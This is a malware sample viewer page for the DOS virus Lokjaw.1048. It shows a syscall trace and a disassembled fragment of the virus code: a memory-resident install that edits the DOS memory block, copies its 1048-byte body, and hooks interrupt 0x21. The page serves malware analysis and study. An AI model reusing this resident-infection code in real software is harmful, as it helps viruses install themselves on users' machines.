Sample viewer

vx.netlux.org/Virus.DOS.Lokjaw.1048

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:06:21.139117836Z 44 PC: 12aa8 | Get time 0x12aa8: cmp ax, 0xdcd
0x12aab: je 0x12b08
0x12aad: mov ax, cs
0x12aaf: dec ax
0x12ab0: mov ds, ax
0x12ab2: cmp byte ptr [0], 0x5a
0x12ab7: jne 0x12b00
0x12ab9: mov ax, word ptr [3]
0x12abc: sub ax, 0x100
0x12abf: mov word ptr [3], ax
0x12ac2: mov bx, ax
0x12ac4: mov ax, es
0x12ac6: add ax, bx
0x12ac8: mov es, ax
0x12aca: mov cx, 0x418
0x12acd: mov ax, ds
0x12acf: inc ax
0x12ad0: mov ds, ax
0x12ad2: lea si, word ptr [bp + 0x106]
0x12ad6: mov di, 0x100
2018-12-17T22:06:21.141703146Z 53 PC: 12aea | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:06:21.142954857Z 37 PC: 12aff | Set interrupt vector (Interrupt = '33' AKA 'Random read')